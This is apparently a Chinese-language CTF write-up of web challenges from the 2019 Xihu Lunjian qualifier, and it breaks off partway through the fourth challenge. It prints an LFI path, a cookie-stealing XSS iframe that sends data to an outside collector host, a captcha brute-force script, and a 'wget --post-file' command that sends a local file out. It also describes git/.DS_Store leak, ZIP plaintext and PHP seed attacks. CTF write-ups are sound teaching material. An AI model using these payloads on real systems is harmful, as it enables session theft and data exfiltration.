第三届西湖论剑网络安全技能大赛预选赛 Web 部分 WriteUp


2019年04月07日,我们参加了第三届西湖论剑网络安全技能大赛预选赛,虽然最后没进决赛,但有些题目我认为还是很值得写一写 WriteUp 的。


1、非常感谢我的两位队友 @巫妖 @京京 的合作,第一次合作打 CTF 配合得真的非常舒服。

2、由于安恒在赛后把靶机给关了,所以我就暂时只能借助我电脑上现有的资料来 写 WriteUp 了。所以很多步骤暂时没有图,得等安恒给出复现环境以后才能截图,见谅哈。

3、环境的话,Mac OS 下面挂着两个虚拟机 Win10 和 Kail Linux,三边依照所需要的工具切换。


第一题(300分)babyt3 :



比赛靶机: http://ctf3.linkedbyx.com:11310/





include $_GET['file'];


2、访问 /?file=php://filter/convert.base64-encode/resource=index.php ,解码 Base64,得到 index.php 源码

 $a = @$_GET['file'];
 if (!$a) {
  $a = './templates/index.html';
 echo 'include $_GET[\'file\']';
 if (strpos('flag',$a)!==false) {
 include $a;

 <!--hint: ZGlyLnBocA== --> 

看一下这个源码,发现里面有个 hit:

<!-- Hit: ZGlyLnBocA== -->

3、Base64 解码一下,发现这个是 dir.php。

4、那么我们再来读一下 dir.php 的源码,访问 /?file=php://filter/convert.base64-encode/resource=dir.php

5、解码 Base64,得到 dir.php 源码。

 $a = @$_GET['dir'];
 $a = '/tmp';

6、可以看到我们可以利用这个文件随意遍历目录了,先来遍历根目录。访问 /dir.php?dir=/

array(25) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(16) "ffffflag_1s_Her4" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(7) "my_init" [14]=> string(10) "my_service" [15]=> string(3) "opt" [16]=> string(4) "proc" [17]=> string(4) "root" [18]=> string(3) "run" [19]=> string(4) "sbin" [20]=> string(3) "srv" [21]=> string(3) "sys" [22]=> string(3) "tmp" [23]=> string(3) "usr" [24]=> string(3) "var" }

7、很幸运的,看到返回的目录列表里就有一个 ffffflag_1s_Her4。

8、继续 dir ffffflag_1s_Her4 这个目标,返回了 False,说明这个是一个文件。那么就用读取文件的方法来盘他。访问 /?file=php://filter/convert.base64-encode/resource=/ffffflag_1s_Her4

9、得到一个 Base64,解码得到 flag。




知识点:储存型 XSS 与其过滤的绕过







Report:给管理员报告页面上的 Bug。


3、先看第一个 Message 这里的留言板,试用一下,推测有储存型 XSS。

4、那么我们就来构造一个 XSS 上去,不断的去尝试绕过过滤。

5、最终发现如下的语句可以绕过并且成功 XSS。 当然,我们得先改一下输入框的最大长度。

长度改为 400
<iframe src="javas&Tab;cript:(function(){(new Image()).src='http://xss.zhaoj.in/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();">


5、然后到 Report 页面提交一个 Message 页面的 Report,验证码那里是要前六位一致,那直接找个 Python 程序去撞,我这里网上找了一个。来源:https://blog.csdn.net/wwl1117/article/details/79104960

import string, hashlib

a = string.digits + string.lowercase + string.uppercase
for i in a:
    for j in a:
        for k in a:
            for m in a:
                s = hashlib.md5(i + j + k + m).hexdigest()[0:4]
                if s == "******":
                    print(i + j + k + m)

6、Report 上去,XSS 平台收 Cookie。


7、然后置 Cookie,发现能在 Exec 页面提交命令了,这里我们提交如下这个命令先试试,读取一下本地的文件传上去。

wget --post-file=/flag.txt http://xss.zhaoj.in/

8、然后就可以在 XSS 平台收到请求了。


9、Flag 到手~

第三题(300分) 猜猜flag是什么:

知识点:敏感文件泄露以及利用(DS_Store 以及 Git),Zip 加密档案明文攻击,PHP 随机数种子获取。




1、 访问靶机,发现是一个骚气的在线赌场。猜测参数,发现要是传 name 和 code 参数页面会有变化,name 会原样显示, code 会提示 Wrong,错咯。


2、Kail Linux 下开 Uniscan 扫起来。


3、扫完之后结果如下,发现这样一个结果 http://ctf1.linkedbyx.com:10172/.DS_Store

4、上网找了一个利用工具 https://github.com/lijiejie/ds_store_exp,用起来。

python /Users/jinzhao/Downloads/ds_store_exp-master/ds_store_exp.py "http://ctf1.linkedbyx.com:10172/.DS_Store"


5、发现这里有一个 http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e ,打开瞧瞧,是这样一个页面。

6、那我们继续来扫扫这个目录下的敏感文件。Uniscan 继续走。

Uniscan 扫这个子目录


8、那就手工来测测,发现测到 .git 目录时不是 404 了,说明有 .git 泄露。

9、网上找了个工具 https://github.com/cumtxujiabin/GitHack , 用起来。

python /Users/jinzhao/Downloads/GitHack-master/GitHack.py http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/.git/ 

10、打开 BackupForMySite.zip 这个压缩文件看看,发现加了密。里面有个 Hint 文件正是我们需要的。

11、不过别慌,index.php 和 lengzhu.jpg 这两个我们都有明文文件,而且它们都在这个加密压缩包里。那么我们就可以用 明文攻击 来获取解压密钥了。

12、我们得先备好一个明文压缩文件,既然之前有 DS_Store 我们就推测他是在 Mac OS 下压缩的吧,那么就在 Mac OS 下压缩 index.php 这个文件。要是用不同的方式压缩,在下面用 APCHPR 明文攻击的时候会出错,提示找不到压缩文件。

12、在这里我切换到 Windows 下,用 ARCHPR 解密。填好相应的设置,开始。



15、然后就会提示我们保存解密之后的 Zip 了。

16、打开解密之后的 Zip,查看 hint 文件。

17、Code 拿到,访问 http://ctf1.linkedbyx.com:10172/?name=glzjin&code=9faedd5999937171912159d28b219d86,这样我们就拿到了“兑换码”

18、综合上面的 hint 里的 “flag saved in flag/seed.txt”,访问 /flag/seed.txt 试试,但是里面的内容为 “NAIVE”。并不是 flag。

19、发现 17 步页面每一个小时都会发生变化,那么就大胆推测其为固定随机数种子生成的随机数,且轮数依照小时数发生变化。

20、查询得知 https://www.openwall.com/php_mt_seed/ 这个工具可以根据随机数撞出随机数种子,我们用起来。

21、首先在 Kail Linux 下编译这个工具。

22、然后将页面上的 Code 作为随机数放入,运行程序,发现找到了八个可能的随机数种子。


23、测试访问 /flag/{随机数种子}.txt,发现 /flag/261530.txt 也就是第一个随机数种子可以访问,里面就是 flag!

24、Flag 到手~



知识点:反射型 XSS




<!-- /main/register -->

3、那么就到 /main/register 注册一下。


5、打 XSS 试试,不行。

6、查看 Report 页面,测试储存型 XSS 不行。



9、仔细测试那个留言板,发现有回复功能,而且回复之后对提到的前文回复有预览,发现一个可能可以利用的反射 XSS 点。/main/post?p=http://xss.zhaoj.in


